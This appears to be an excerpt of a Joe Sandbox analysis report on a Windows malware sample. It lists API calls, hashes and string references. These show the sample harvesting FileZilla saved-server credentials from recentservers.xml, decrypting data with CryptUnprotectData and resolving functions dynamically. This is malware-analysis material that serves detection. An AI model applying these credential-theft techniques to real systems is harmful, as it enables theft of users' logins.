                                    • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                    • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                    • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F9885
                                    • Process32First.KERNEL32(00420ACA,00000128), ref: 007F9899
                                    • Process32Next.KERNEL32(00420ACA,00000128), ref: 007F98AE
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 007F98C3
                                    • CloseHandle.KERNEL32(00420ACA), ref: 007F98E1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                    • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                    • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                    • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 007EE709
                                    • StrCmpCA.SHLWAPI(?,004214F8), ref: 007EE759
                                    • StrCmpCA.SHLWAPI(?,004214FC), ref: 007EE76F
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EEE46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID:
                                    • API String ID: 433455689-0
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007E9DEB
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 007E9E0A
                                    • memcpy.MSVCRT(?,?,?), ref: 007E9E2D
                                    • LocalFree.KERNEL32(?), ref: 007E9E3A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                    • String ID:
                                    • API String ID: 3243516280-0
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                    • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                    • LocalFree.KERNEL32(?), ref: 00409BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                    • String ID:
                                    • API String ID: 3243516280-0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00A197D8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00A197D8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00A197D8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                    • wsprintfA.USER32 ref: 00417AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 362916592-0
                                    APIs
                                    • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .$GetProcAddress.$l
                                    • API String ID: 0-2784972518
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 007EF985
                                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 007EF9D6
                                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 007EF9EC
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EFD18
                                    • FindClose.KERNEL32(000000FF), ref: 007EFD2A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 007FD156
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009E9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9e9000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • strtok_s.MSVCRT ref: 0041031B
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                    • lstrlenA.KERNEL32(00000000), ref: 00410393
                                      • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                      • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                    • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                    • lstrlenA.KERNEL32(00000000), ref: 00410427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                    • lstrlenA.KERNEL32(00000000), ref: 00410475
                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                    • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                    • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                    • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                    • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                    • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                    • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                    • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                    • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                    • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                    • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                    • strtok_s.MSVCRT ref: 00410679
                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                    • memset.MSVCRT ref: 004106DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 337689325-514892060
                                    • Opcode ID: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                    • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                    • Opcode Fuzzy Hash: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                    • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                    APIs
                                    • lstrlen.KERNEL32(00424DA0), ref: 007E4833
                                    • lstrlen.KERNEL32(00424E50), ref: 007E483E
                                    • lstrlen.KERNEL32(00424F18), ref: 007E4849
                                    • lstrlen.KERNEL32(00424FD0), ref: 007E4854
                                    • lstrlen.KERNEL32(00425078), ref: 007E485F
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E486E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007E4875
                                    • lstrlen.KERNEL32(00425120), ref: 007E4883
                                    • lstrlen.KERNEL32(004251C8), ref: 007E488E
                                    • lstrlen.KERNEL32(00425270), ref: 007E4899
                                    • lstrlen.KERNEL32(00425318), ref: 007E48A4
                                    • lstrlen.KERNEL32(004253C0), ref: 007E48AF
                                    • lstrlen.KERNEL32(00425468), ref: 007E48C3
                                    • lstrlen.KERNEL32(00425510), ref: 007E48CE
                                    • lstrlen.KERNEL32(004255B8), ref: 007E48D9
                                    • lstrlen.KERNEL32(00425660), ref: 007E48E4
                                    • lstrlen.KERNEL32(00425708), ref: 007E48EF
                                    • lstrlen.KERNEL32(004257B0), ref: 007E4918
                                    • lstrlen.KERNEL32(00425858), ref: 007E4923
                                    • lstrlen.KERNEL32(00425920), ref: 007E492E
                                    • lstrlen.KERNEL32(004259C8), ref: 007E4939
                                    • lstrlen.KERNEL32(?), ref: 007E4944
                                    • strlen.MSVCRT ref: 007E4957
                                    • lstrlen.KERNEL32(00425B18), ref: 007E497F
                                    • lstrlen.KERNEL32(00425BC0), ref: 007E498A
                                    • lstrlen.KERNEL32(00425C68), ref: 007E4995
                                    • lstrlen.KERNEL32(00425D10), ref: 007E49A0
                                    • lstrlen.KERNEL32(00425DB8), ref: 007E49AB
                                    • lstrlen.KERNEL32(00425E60), ref: 007E49BB
                                    • lstrlen.KERNEL32(00425F08), ref: 007E49C6
                                    • lstrlen.KERNEL32(00425FB0), ref: 007E49D1
                                    • lstrlen.KERNEL32(00426058), ref: 007E49DC
                                    • lstrlen.KERNEL32(00426100), ref: 007E49E7
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 007E4A03
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                    • String ID:
                                    • API String ID: 2127927946-0
                                    • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                    • Instruction ID: fae35708eb3f9612709036cdb0a8d25a3c44bc35552dc5c9a9d64343533d5a49
                                    • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                    • Instruction Fuzzy Hash: 2141DA79740624EBC718AFE5FC8DB987F71AB4C702BA0C062F90295190CBB9D5019B3D
                                    APIs
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 007F9B08
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 007F9B21
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 007F9B39
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 007F9B51
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 007F9B6A
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 007F9B82
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 007F9B9A
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 007F9BB3
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 007F9BCB
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 007F9BE3
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 007F9BFC
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 007F9C14
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 007F9C2C
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 007F9C45
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 007F9C5D
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 007F9C75
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 007F9C8E
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 007F9CA6
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 007F9CBE
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 007F9CD7
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 007F9CEF
                                    • LoadLibraryA.KERNEL32(0064A550,?,007F6C67), ref: 007F9D01
                                    • LoadLibraryA.KERNEL32(0064A17C,?,007F6C67), ref: 007F9D12
                                    • LoadLibraryA.KERNEL32(0064A104,?,007F6C67), ref: 007F9D24
                                    • LoadLibraryA.KERNEL32(0064A1DC,?,007F6C67), ref: 007F9D36
                                    • LoadLibraryA.KERNEL32(0064A328,?,007F6C67), ref: 007F9D47
                                    • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 007F9D69
                                    • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 007F9D8A
                                    • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 007F9DA2
                                    • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 007F9DC4
                                    • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 007F9DE5
                                    • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 007F9E06
                                    • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 007F9E1D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID:
                                    • API String ID: 2238633743-0
                                    • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                    • Instruction ID: e7a5685ff74a1fa169fce1c1b09efaf00b5f9e129014be481623354cde75a331
                                    • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                    • Instruction Fuzzy Hash: 1CA13DBD5C0240BFE354EFE8ED88AA63BFBF74E301714661AE605C3264D6399441DB52
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9C53
                                      • Part of subcall function 007E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9C78
                                      • Part of subcall function 007E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 007E9C98
                                      • Part of subcall function 007E9C27: ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9CC1
                                      • Part of subcall function 007E9C27: LocalFree.KERNEL32(007E16F6), ref: 007E9CF7
                                      • Part of subcall function 007E9C27: CloseHandle.KERNEL32(000000FF), ref: 007E9D01
                                      • Part of subcall function 007F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F90B9
                                    • strtok_s.MSVCRT ref: 007F0582
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 007F05C9
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F05D0
                                    • StrStrA.SHLWAPI(00000000,00421618), ref: 007F05EC
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F05FA
                                      • Part of subcall function 007F8B47: malloc.MSVCRT ref: 007F8B4F
                                      • Part of subcall function 007F8B47: strncpy.MSVCRT ref: 007F8B6A
                                    • StrStrA.SHLWAPI(00000000,00421620), ref: 007F0636
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F0644
                                    • StrStrA.SHLWAPI(00000000,00421628), ref: 007F0680
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F068E
                                    • StrStrA.SHLWAPI(00000000,00421630), ref: 007F06CA
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F06DC
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F0769
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F0781
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F0799
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F07B1
                                    • lstrcat.KERNEL32(?,0042164C), ref: 007F07C9
                                    • lstrcat.KERNEL32(?,00421660), ref: 007F07D8
                                    • lstrcat.KERNEL32(?,00421670), ref: 007F07E7
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F07FA
                                    • lstrcat.KERNEL32(?,00421678), ref: 007F0809
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F081C
                                    • lstrcat.KERNEL32(?,0042167C), ref: 007F082B
                                    • lstrcat.KERNEL32(?,00421680), ref: 007F083A
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F084D
                                    • lstrcat.KERNEL32(?,00421688), ref: 007F085C
                                    • lstrcat.KERNEL32(?,0042168C), ref: 007F086B
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F087E
                                    • lstrcat.KERNEL32(?,00421698), ref: 007F088D
                                    • lstrcat.KERNEL32(?,0042169C), ref: 007F089C
                                    • strtok_s.MSVCRT ref: 007F08E0
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F08F5
                                    • memset.MSVCRT ref: 007F0944
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
